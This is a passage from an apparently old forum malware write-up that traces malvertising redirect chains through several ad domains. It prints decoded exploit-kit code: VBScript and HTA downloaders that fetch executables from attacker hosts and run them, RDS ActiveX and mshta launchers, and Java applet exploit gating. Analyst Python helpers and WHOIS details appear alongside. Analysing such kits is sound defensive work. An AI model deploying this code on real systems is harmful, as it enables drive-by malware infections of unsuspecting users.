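    major, minor, micro, upd = parsed
    present = major != 0  # jvjs[0]!=0 : a major of 0 means the probe failed
    return {
        # (jvjs[1]<2)
        "msjvm": present and minor < 2,
        # ((jvjs[1]<=4) && (jvjss[0]<=2) && (jvjss[1]<06)) || (jvjs[1]<=3)
        "secman": present and ((minor <= 4 and micro <= 2 and _lt(upd, 6)) or minor <= 3),
        # ((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<2)) || (jvjs[1]<=4)
        "unsafe": present and ((minor <= 5 and micro == 0 and _lt(upd, 2)) or minor <= 4),
        # ((jvjs[1]==5) && (jvjss[0]==0) && (jvjss[1]<10))
        #   || ((jvjs[1]==4) && (jvjss[0]==2) && (jvjss[1]>5) && (jvjss[1]<13))
        "impro": present and (
            (minor == 5 and micro == 0 and _lt(upd, 10))
            or (minor == 4 and micro == 2 and upd is not None and 5 < upd < 13)
        ),
    }


def is_targeted(version: str) -> bool:
    """True when the script would load at least one of its applets."""
    return any(java_gates(version).values())


if __name__ == "__main__":
    # Constructed version strings, not values observed on any host.
    for v in ("1.5.0_09", "1.4.2_06", "1.5.0_10", "1.6.0_07", "1.1.8"):
        print(v, java_gates(v))
```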

ssa.adxdnet.net/code/smain.php?scout=objmsit

No code present at the time of the writeup.

CODE
<script language="javascript">

</script>

In the code above we also notice a reference to srun.php.

ssa.adxdnet.net/code/srun.php

CODE
<script language="javascript">try{window.moveTo(-3000,-3000);} catch(e){window.close();}</script>
<hta:application showintaskbar="no" windowstate="normal">

<script language="VBScript">
on error resume next
Self.MoveTo 3300, 3300

Function DownloadExecute(source, target)
on error resume next
Dim wobj, eobj, sobj, xobj, aobj, eloc, tfold, tfile, binstring, response, i

Set eobj = CreateObject(Unescape("%"+"53%68%65%6c%6c%"+"2e%41%70%70%6c%69%63%61%74%69%6f%6e"))
// "Shell.Application"
Set sobj = CreateObject(Unescape("%"+"53%63%72%69%"+"70%74%69%6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"))
// "Scripting.FileSystemObject"

If VarType(xobj) <> vbObject Then Set xobj = CreateObject(Unescape("%"+"57%69%6e%48%74%"+"74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"))
// "WinHttp.WinHttpRequest.5.1"
If VarType(xobj) <> vbObject Then Set xobj = CreateObject(Unescape("%"+"57%69%"+"6e%48%74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"))
// "WinHttp.WinHttpRequest"
If VarType(xobj) <> vbObject Then Set xobj = CreateObject(Unescape("%"+"4d%53%58%4d%4c%32%"+"2e%58%4d%4c%48%54%54%50"))
// "MSXML2.XMLHTTP"
If VarType(xobj) <> vbObject Then Set xobj = CreateObject(Unescape("%"+"4d%69%63%72%6f%73%"+"6f%66%74%2e%58%4d%4c%48%54%54%50"))
// "Microsoft.XMLHTTP"

Set tfold = sobj.GetSpecialFolder(2)
eloc = tfold & Chr(92) & target

If sobj.FileExists(eloc) = False Then
   xobj.Open "GET", source, False
   xobj.setRequestHeader "Request", "srun"
   xobj.Send
   response = xobj.ResponseText
  
  
    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 5000
    
    sp = 1
    If ss > sn Then sp = FormatNumber((ss / sn), 0) + 1
    ReDim sd(sp), bd(sp)
    
    For i = 0 To sp
       sd(i) = Mid(response, (i*sn)+1, sn)
    
       For x = 1 To Len(sd(i)) Step 2
       bd(i) = bd(i) & Chr(Clng("&H" & Mid(sd(i), x, 2)))
       Next
    
       binstring = binstring & bd(i)
    Next
            
   If Len(binstring) > 1 And InStr(LCase(binstring), "<html>") = 0 Then
   Set tfile = tfold.CreateTextFile(target)
   tfile.Write binstring
   tfile.Close
   End If
End If

If sobj.FileExists(eloc) Then eobj.ShellExecute eloc, "", "", "open", 0
End Function

Function InvDownloadExecute()
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=xpre", "xpre.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=prun", "prun.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=wavvsnet", "wavvsnet.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=snapsnet", "snapsnet.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=rasesnet", "rasesnet.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=eeevsnet", "eeevsnet.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=winvsnet", "winvsnet.exe")

Self.Close
End Function

Call window.setTimeout("InvDownloadExecute", 360000, "VBScript")
</script>

As you will have noticed, the bad guys experiment with a huge number of vulnerabilities to get their junk on your PC. Keep Windows, Java, Office, WMP ... and applications updated! Secure your browser, whether you use Internet Explorer, Firefox or Opera.

<h4>
IP details
</h4>
espads.net - 85.17.162.100

Website Title: Index of /
ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2008-08-21
Expires: 2009-08-21
Updated: 2008-08-21
Name Server: NS1.DOMAINSERVICE.COM (has 403,408 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.0.52 (CentOS)
IP Location - Noord-holland - Amsterdam - Leaseweb

Whois Record
Domain Name: ESPADS.NET

Registrant [1495550]:
Moniker, Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

hostnames sharing ip with a-records
Kimberly
<h4>
Starting point at Clicksor
</h4>
creative.clicksor.com/network_1020/498/c212999415.html

CODE
<script language="javascript" src="http://ads.adsrefer.net/serve/servecst?atype=b2&pid=[*]"></script>

CODE
GET /serve/servecst?atype=b2&pid=[*] HTTP/1.1
Accept: */*
Referer: http://creative.clicksor.com/network_1020/498/c212999415.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ads.adsrefer.net
Proxy-Connection: Keep-Alive
The page leads to:

CODE
document.location.href='http://ads.adsrefer.net/serve/showcst?atype=b2&pid=[*]&cid=[*]&tid=[*]'

<h4>
ads.adsrefer.net
</h4>
ads.adsrefer.net/serve/showcst?atype=b2&pid=[*]&cid=[*]&tid=[*]

For a change, the page isn't encrypted, and we easily obtain the details.

CODE
<script type="text/javascript" language="javascript" src="http://www.awltovhc.net/placeholder-1225937-2033172771?atype=b2&pid=118627"></script>
<iframe src="http://adsecxnet.ws/document/banner?type=1&pid=154982" width="1" height="1" frameborder="0"></iframe>
</body></html>
  1. adsecxnet.ws/document/banner?type=1&pid=[snip] returns a 404 error.

    CODE
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /data.php was not found on this server.</p>
    <hr>
    <address>Apache Server at adsecxnet.ws Port 80</address>
    </body></html>

  2. www.awltovhc.net/placeholder-1225937-2033172771?atype=b2&pid=[snip] decoded:

    CODE
    <a href="http://www.jdoqocy.com/click-2406336-10416079" target="_top"><img src="http://www.ftjcfx.com/image-2406336-10416079" width="160" height="600" alt="RF Online US Eshop Link" border="0"/></a><script language="javascript" src="http://www.kasdfps.net/placeholder-1163731-2033191062"></script>
<h4>
www.awltovhc.net
</h4>
  1. www.jdoqocy.com/click-2406336-10416079 - click target.
  2. www.ftjcfx.com/image-2406336-10416079

    CODE
    The URL has moved <a href="http://www.yceml.net/0975/10416079-3.gif">here</a>

    Banner to be displayed: www.yceml.net/0975/10416079-3.gif

  3. Link to www.kasdfps.net
<h4>
www.kasdfps.net
</h4>
CODE
GET /placeholder-1163731-2033191062 HTTP/1.1
Accept: */*
Referer: http://ads.adsrefer.net/serve/showcst?atype=b2&pid=[*]&cid=[*]&tid=[*]
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.kasdfps.net
Proxy-Connection: Keep-Alive

The script, once decoded, shows a PDF exploit (which are seen more and more) and 4 iframes:
CODE
<script language="javascript">
var pdfrd, pdfrv, pobj;

var nsplugad = navigator.plugins["Adobe Acrobat"];
if(nsplugad && nsplugad.description.indexOf("Version") == -1) {
pdfrd = true;
}

if(!pdfrd) { try {
var pobj = document.createElement("object");
pobj.classid = "clsid:CA8A9780-280D-11CF-A24D-444553540000";
if(pobj.readyState != 0) {
try { pdfrv = pobj.getversions().indexOf("Form=8"); }catch(e){}
if(pdfrv) { pdfrd = true; }
}
} catch(e) {} }

if(!pdfrd && window.ActiveXObject) {
try { pobj = new ActiveXObject("AcroPDF.PDF"); }catch(e){}
try { pdfrv = pobj.getversions().indexOf("Form=8"); }catch(e){}
if(pdfrv) { pdfrd = true; }
}

if(pdfrd) {
document.write('<iframe src="http://adsecxnet.ws/document/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
}
</script>

<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=acxcrds" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=acxcobj" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=jvcxeng" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=objmsit" frameborder="0" style="width:1px;height:1px;"></iframe>
All the pages at srv.ad-adnet.net contain obfuscated scripts. Below is their content once decoded.

srv.ad-adnet.net/code/smain.php?scout=acxcrds

CODE
<script language="VBScript">
on error resume next

Function DownExRdsDsc(source, target)
on error resume next
Dim cobj, xobj, eobj, sobj, tfld, eloc, tfile, response, bindata, i, x

Set cobj = document.createElement("object")
cobj.setAttribute "classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("WinHttp.WinHttpRequest.5.1","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("WinHttp.WinHttpRequest","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("Microsoft.XMLHTTP","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("MSXML2.XMLHTTP","")
Set eobj = cobj.CreateObject("Shell.Application","")
Set sobj = cobj.CreateObject("Scripting.FileSystemObject","")

If VarType(xobj) And VarType(eobj) And VarType(sobj) Then
xobj.Open "GET", source, False
xobj.setRequestHeader "Request", "smain"
xobj.Send
response = xobj.responseText

If Len(response) > 1 And InStr(LCase(response), "<html>") = 0 Then

Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target & ".tmp")

If sobj.FileExists(eloc) = False Then

    Set tfile = sobj.CreateTextFile(eloc, True)

    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 10000
    
    sp = Int(ss / sn)
    ReDim sd(sp), bd(sp)

    For i = 0 To sp
        sd(i) = Mid(response, (i*sn)+1, sn)
        For x = 1 To Len(sd(i)) Step 2
        bd(i) = bd(i) & Chr("&H" & Mid(sd(i), x, 2))
        Next
        tfile.Write bd(i)
    Next

    tfile.Close
End If

End If

If sobj.FileExists(eloc) Then
If VarType(eobj) = vbObject Then
eobj.ShellExecute "cmd", " /c start """" """ & eloc & """", "", "open", 0
Else wobj.run "cmd /c start """" """ & eloc & """", 0
End If
End If

End If
End Function

Call DownExRdsDsc("http://srv.ad-adnet.net/get?src=d1", "aswcxwxxsm")
Call DownExRdsDsc("http://srv.ad-adnet.net/get?src=xrun", "aewcoorwsx")
Call DownExRdsDsc("http://srv.ad-adnet.net/get?src=xpre", "weoaxrroow")
</script>
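The hex-text transport used by DownloadExecute in srun.php and by the get?src= downloaders on srv.ad-adnet.net can be reversed offline to recover the dropped file from a captured response. The Python helper below is an added example, not part of the original post and not the kit's code: it mirrors the script's acceptance rules, decodes the pairs and sanity-checks the result as a PE image; the sample response is a constructed 68-byte stub, not a real capture.

```python
import hashlib
import re

# Added analyst helper (not from the write-up): reverses the transport encoding
# of the get.php?src=... / get?src=... responses. The server sends the file as
# text, two hex characters per byte, and the VBScript rebuilds it with
# Chr("&H" & pair) before writing it to the temp folder.

HTML_MARKER = "<html>"
_HEX_RE = re.compile(r"[0-9A-Fa-f]*")


class PayloadDecodeError(ValueError):
    """Raised when the text cannot be a hex-encoded payload."""


def decode_hex_payload(response_text: str) -> bytes:
    """Turn the hex text back into bytes, applying the acceptance rules the
    downloader uses (non-empty, no "<html>" anywhere, case-insensitive) and
    rejecting what it would silently mangle (non-hex text or odd length)."""
    if len(response_text) <= 1:
        raise PayloadDecodeError("empty response")
    if HTML_MARKER in response_text.lower():
        # The script treats any "<html>" as an error page and writes nothing.
        raise PayloadDecodeError("HTML page instead of a payload")
    if _HEX_RE.fullmatch(response_text) is None:
        raise PayloadDecodeError("non-hex characters in body")
    if len(response_text) % 2:
        # Chr("&H" & "4") would still yield a byte; refuse rather than guess.
        raise PayloadDecodeError("odd number of hex digits")
    return bytes.fromhex(response_text)


def is_payload_response(response_text: str) -> bool:
    """True when the text decodes cleanly as a dropped file."""
    try:
        decode_hex_payload(response_text)
    except PayloadDecodeError:
        return False
    return True


def pe_summary(data: bytes) -> dict:
    """Sanity-check the recovered bytes as a PE image and hash them for
    sharing: 'MZ' at offset 0, e_lfanew at 0x3C pointing at the PE signature."""
    is_mz = data[:2] == b"MZ"
    pe_off = int.from_bytes(data[0x3C:0x40], "little") if len(data) >= 0x40 else None
    is_pe = is_mz and pe_off is not None and data[pe_off:pe_off + 4] == b"PE\x00\x00"
    return {
        "size": len(data),
        "mz": is_mz,
        "pe_offset": pe_off,
        "pe": is_pe,
        "sha256": hashlib.sha256(data).hexdigest(),
    }


# Constructed sample (not a real capture): a 68-byte stub with a valid DOS
# header and PE signature, encoded the way the server sends real files.
_STUB_IMAGE = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00"
CONSTRUCTED_RESPONSE = _STUB_IMAGE.hex().upper()
CONSTRUCTED_ERROR_PAGE = "<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD></HTML>"

if __name__ == "__main__":
    recovered = decode_hex_payload(CONSTRUCTED_RESPONSE)
    print(pe_summary(recovered))
    print("error page accepted:", is_payload_response(CONSTRUCTED_ERROR_PAGE))
```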

srv.ad-adnet.net/code/smain.php?scout=acxcobj

CODE
<script language="javascript">
var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); }catch(e){} }
if(a) { try { var b = a.CreateObject("WScript.Shell",""); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", "clsid:AB9BCEDD-EC7E-47E1-9322-D4A210617116"); }catch(e){} }
if(a) { try { var b = a.CreateObject("WScript.Shell"); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", "clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8"); }catch(e){} }
if(a) { try { a.RunApplication(1, "mshta http://srv.ad-adnet.net/code/srun", 1); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject("TxCtx.TransactionContext"); }catch(e){}
if(a) { try { var b = a.CreateInstance("WScript.Shell"); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject("WMIScriptUtils.WMIObjectBroker2"); }catch(e){}
if(a) { try { var b = a.CreateObject("WScript.Shell"); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject("Outlook.Application"); }catch(e){}
if(a) { try { var b = a.CreateObject("WScript.Shell"); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false;
try { var a = new ActiveXObject("WScript.Shell"); }catch(e){}
if(a) { try { a.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }
</script>

<script language="VBScript">
on error resume next

Function DownExAxObj(source, target)
on error resume next
Dim cobj, wobj, eobj, sobj, xobj, tfld, eloc, tfile, response, bindata, i, x

if VarType(cobj) <> vbObject Then Set cobj = CreateObject("Outlook.Application")
if VarType(cobj) <> vbObject Then Set cobj = CreateObject("WMIScriptUtils.WMIObjectBroker2")

Set wobj = cobj.CreateObject("WScript.Shell")
Set sobj = cobj.CreateObject("Scripting.FileSystemObject")

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("WinHttp.WinHttpRequest.5.1","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("WinHttp.WinHttpRequest","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("Microsoft.XMLHTTP")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("MSXML2.XMLHTTP")

xobj.Open "GET", source, False
xobj.setRequestHeader "Request", "smain"
xobj.Send
response = xobj.responseText

If Len(response) > 1 And InStr(LCase(response), "<html>") = 0 Then

Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target & ".tmp")

If sobj.FileExists(eloc) = False Then
    
    Set tfile = sobj.CreateTextFile(eloc, True)

    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 10000
    
    sp = Int(ss / sn)
    ReDim sd(sp), bd(sp)

    For i = 0 To sp
        sd(i) = Mid(response, (i*sn)+1, sn)
        For x = 1 To Len(sd(i)) Step 2
        bd(i) = bd(i) & Chr("&H" & Mid(sd(i), x, 2))
        Next
        tfile.Write bd(i)
    Next

    tfile.Close
End If

End If

wobj.run "cmd /c start """" """ & eloc & """", 0
End Function

Call DownExAxObj("http://srv.ad-adnet.net/get?src=xrun", "ecewxnsree")
Call DownExAxObj("http://srv.ad-adnet.net/get?src=xpre", "oamnxewsmx")
</script>

srv.ad-adnet.net/code/smain.php?scout=jvcxeng

CODE
<script language="javascript">
if(navigator.javaEnabled()) {

var jvmmsvm, jvmsec, jvmusafe, jvmiproc;
var i=0; var x=0; var z=0;
if(navigator.appName.toLowerCase().indexOf("microsoft") != -1) {

// Get Clientcaps version
try {
oClientCaps = document.createElement("div");
oClientCaps.style.behavior = "url(#default#clientCaps)";
}catch(e){}

function GetVersion(CLSID) { try {
if(oClientCaps.isComponentInstalled(CLSID,"ComponentID")) {
return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");
} else { return Array(0,0,0,0); }
}catch(e){} }
      
var jvoc  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

// Get JavaApplet version
var jvmverm = document.createElement("applet");
jvmverm.archive = "jvmvers.jar";
jvmverm.code = "vmain.class";
jvmverm.width = "1"; jvmverm.height = "1";
document.body.appendChild(jvmverm);

//window.onload = definemsm;
function jvloadc() { i = i+1;
if(jvmverm.jversion || (typeof jvmverm.jversion != "undefined")) { definemsm(); }
else if(i < 30) { setTimeout("jvloadc()", 300); }
} setTimeout("jvloadc()", 300);

function definemsm() { try {
var jvjm, jvjv, jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc;
try{ jvjm = jvmverm.jversion+""; jvjv = jvmverm.jvendor+""; }catch(e){}
if(jvjm.indexOf(".") == -1) { jvja = false; } else { jvja = jvjm.split("."); }
if(!jvja) { jvja = Array(0,0,"0_0"); }
var jvjas = jvja[2].split("_");
if((jvoc[0]!=0) && (jvoc[2]<3810) && ((jvja[1]<2) || (jvja[0]==0)) && (jvjv.indexOf("Microsoft") != -1)) { sjmsjvm = true; } else { sjmsjvm = false; }
if((jvja[0]!=0) && (((jvja[1]<=4) && (jvjas[0]<=2) && (jvjas[1]<06)) || (jvja[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<2)) || (jvja[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<10)) || (jvja[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvja[0]!=0) && (((jvja[1]==5) && (jvjas[0]==0) && (jvjas[1]<10)) || ((jvja[1]==4) && (jvjas[0]==2) && (jvjas[1]>5) && (jvjas[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}catch(e){} }

} else {
// Non ie browsers

// Get Script version
try {
var jvjs = java.lang.System.getProperty("java.version")+"";
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {}

// Get Plugin version
if((!jvjs) && navigator.plugins["Java Plug-in"]) { try {
var jpd = navigator.plugins["Java Plug-in"].description;
var jvjs = jpd.substring(jpd.indexOf("1"),jpd.indexOf(" ", jpd.indexOf("1")));
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {} }

// Get JavaApplet Version
if(!jvjs) {
var jvmverf = document.createElement("applet");
jvmverf.archive = "jvmvers.jar";
jvmverf.code = "vmain.class";
jvmverf.width = "1"; jvmverf.height = "1";
document.body.appendChild(jvmverf);
}

if(!jvjs) {
function jvloadfc() { i = i+1;
if(jvmverf.jversion) { defineffm(); }
else if(i < 30) { setTimeout("jvloadfc()", 300); }
} setTimeout("jvloadfc()", 300);
} else { setTimeout("defineffm()", 100); }

function defineffm() { try {
var sjmsjvm, sjsecmn, sjusafe, sjiproc;
if(!jvjs) { try{ var jvjj = jvmverf.jversion+""; jvjs = jvjj.split("."); }catch(e) {} }
if(jvjs) {
var jvjss = jvjs[2].split("_");
if((jvjs[0]!=0) && (jvjs[1]<2)) { var sjmsjvm = true; } else { sjmsjvm = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=4) && (jvjss[0]<=2) && (jvjss[1]<06)) || (jvjs[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<2)) || (jvjs[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<10)) || (jvjs[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvjs[0]!=0) && (((jvjs[1]==5) && (jvjss[0]==0) && (jvjss[1]<10)) || ((jvjs[1]==4) && (jvjss[0]==2) && (jvjss[1]>5) && (jvjss[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvjs, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}
}catch(e) {} }

} // End Else Not IE

function printjameth(jvers, sjmsjvm, sjsecmn, sjusafe, sjiproc) { try {
//alert("JVERSION: "+jvers+" MSJVM: "+sjmsjvm+" SECMAN: "+sjsecmn+" USAFE: "+sjusafe+" IMPRO: "+sjiproc);

if(sjmsjvm) {
jvmmsvm = document.createElement("applet");
jvmmsvm.archive = "jvmmsvm.jar";
jvmmsvm.code = "vmain.class";
jvmmsvm.width = "1"; jvmmsvm.height = "1";
var jvmmsvp = document.createElement("param");
jvmmsvp.name = "sdata";
jvmmsvp.value = "http://srv.ad-adnet.net/xrun.tmp;http://srv.ad-adnet.net/xpre.tmp";
jvmmsvm.appendChild(jvmmsvp);
document.body.appendChild(jvmmsvm);
}

if(sjsecmn) {
jvmsec = document.createElement("applet");
jvmsec.archive = "jvmsecman.jar";
jvmsec.code = "vmain.class";
jvmsec.width = "1"; jvmsec.height = "1";
document.body.appendChild(jvmsec);
setTimeout("sjvsecc()", 300);
}

if(sjusafe) {
jvmusafe = document.createElement("applet");
jvmusafe.archive = "jvmusafe.jar";
jvmusafe.code = "vmain.class";
jvmusafe.width = "1"; jvmusafe.height = "1";
document.body.appendChild(jvmusafe);
setTimeout("sjvusafc()", 300);
}

if(sjiproc) {
jvmimpro = document.createElement("applet");
jvmimpro.archive = "jvmimpro.jar";
jvmimpro.code = "vmain.class";
jvmimpro.width = "1"; jvmimpro.height = "1";
var jvmimpp = document.createElement("param");
jvmimpp.name = "sdata";
jvmimpp.value = "http://ad-adnet.net/d1.exe";
jvmimpro.appendChild(jvmimpp);
document.body.appendChild(jvmimpro);
}
}catch(e) {} }

function sjvsecc() { x = x+1;
if(typeof jvmsec.getClass != "undefined") { sjvmsec(); }
else if(x < 30) { setTimeout("sjvsecc()", 300); }
}

// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://srv.ad-adnet.net/xrun.tmp;http://srv.ad-adnet.net/xpre.tmp";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

function sjvusafc() { z = z+1;
if(typeof jvmusafe.getClass != "undefined") { sjvmusaf(); }
else if(z < 30) { setTimeout("sjvusafc()", 300); }
}

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://srv.ad-adnet.net/xrun.tmp;http://srv.ad-adnet.net/xpre.tmp";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }

}  // end javaenabled
</script>

srv.ad-adnet.net/code/smain.php?scout=objmsit

No code present at the time of the writeup.

CODE
<script language="javascript">

</script>

In the code above we also notice a reference to srv.ad-adnet.net/code/srun

CODE
var a = false;
try { var a = new ActiveXObject("WScript.Shell"); }catch(e){}
if(a) { try { a.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

srv.ad-adnet.net/code/srun

IPB Image

It isn't easy to show the code from this one as it happens "on the fly" ... srun does request a piece of code from the server and that is incorporated into the stuff below.

CODE
var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft"+".XMLHTTP"); }catch(e){} }
if(xobj) {
xobj.open("GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun,2034504393");
xobj.send(null);
response = xobj.responseText;
}
if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}

The reply below will be decoded by dec(asas(response), "s", 2)

IPB Image

Again a huge amount of vulnerabilities to get their junk on your PC. Keep Windows, Java, Office, WMP ... and applications updated! Secure your browser, whether you use Internet Explorer, Firefox or Opera.

<h4>
Another starting point at Clicksor
</h4>
creative.clicksor.com/network_1020/498/c212999415.html
ads.adsrefer.net/serve/showcst?atype=b2&pid=[*]&cid=[*]&tid=[*]

CODE
<script type="text/javascript" language="javascript" src="http://www.iwdjiamk.net/placeholder-1526530-1921905972?atype=b2&pid=[*]"></script>
<iframe src="http://adsecxnet.ws/document/banner?type=1&pid=[*]" width="1" height="1" frameborder="0"></iframe>

<h4>
www.iwdjiamk.net
</h4>
CODE
<a href="http://www.dpbolvw.net/click-2406336-10479732" target="_top"><img src="http://www.lduhtrp.net/image-2406336-10479732" width="160" height="600" alt="Apple Store" border="0"/></a><script language="javascript" src="http://www.kiafjwo.net/placeholder-1262627-1921920093"></script>
  1. www.dpbolvw.net - click target.
  2. www.lduhtrp.net

    CODE
    The URL has moved <a href="http://www.yceml.net/0116/10479732-9.jpg">here</a>

    Banner to be displayed: www.yceml.net/0116/10479732-9.jpg

    IPB Image

  3. Link to www.kiafjwo.net and from there on we all know what happens next.
<h4>
IP details
</h4>
ads.adsrefer.net - 85.17.162.100

Registrar: MONIKER ONLINE SERVICES, INC.
Name Server: NS1.DOMAINSERVICE.COM
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Updated Date: 10-sep-2008
Creation Date: 10-sep-2008

Server Type: Apache/2.0.52 (CentOS)
IP Location - Noord-holland - Amsterdam - Leaseweb

Registrant [1520277]:
Moniker, Privacy Services ADSREFER.NET@domainservice.com
Moniker Privacy Services

hostnames sharing ip with a-records
  1. *.ad-adnet.net
  2. *.adrefer.net
  3. *.adsrefer.net
  4. *.adteksrv.net
  5. *.kasdfps.net
  6. ad-adnet.net
  7. ad.adrefer.net
  8. adpopserve.net
  9. adpopshow.net
  10. adrefer.net
  11. ads.adsrefer.net
  12. adsrefer.net
  13. adteksrv.net
  14. awltovhc.net
  15. awofkwy.net
  16. espads.net
  17. iefjios.net
  18. ikwlkad.net
  19. iwdjiamk.net
  20. kasdfps.net
  21. kiafjwo.net
  22. klite.ath.cx
  23. netcrefer.net
  24. netcshow.net
  25. serv.adteksrv.net
  26. srv.ad-adnet.net
  27. tqlkg.net
  28. www.kasdfps.net
  29. xpseek.net
Kimberly
<h4>
Starting point at Clicksor
</h4>
creative.clicksor.com/network_1020/498/c212999415.html

CODE
<script language="javascript" src="ads.adsrefer.net/serve/servecst?atype=b2&pid=[*]"></script>

CODE
GET /serve/servecst?atype=b2&pid=[*] HTTP/1.1
Referer: http://creative.clicksor.com/network_1020/498/c212999415.html
Accept-Language: en-us
